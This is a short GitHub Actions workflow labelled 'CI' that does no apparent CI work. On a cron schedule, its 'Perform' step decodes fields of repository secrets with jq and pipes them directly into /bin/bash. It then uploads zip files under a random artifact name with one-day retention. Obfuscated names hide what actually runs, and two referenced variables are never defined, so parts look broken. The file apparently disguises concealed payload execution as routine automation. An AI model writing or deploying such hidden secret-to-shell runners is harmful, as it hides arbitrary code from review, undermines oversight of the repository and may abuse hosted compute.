name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '35 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          me3: ${{ secrets.me3 }}
        run: |
          printf '%s' "$me3" | jq -r .cufj8122 | /bin/bash
          printf '%s' "$mwga2" | jq -r .gat51606 | /bin/bash
          printf '%s' "$uoksu0085" | jq -r .dsemv4 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 5ZVfDyK5
          path: "*.zip"
          retention-days: 1
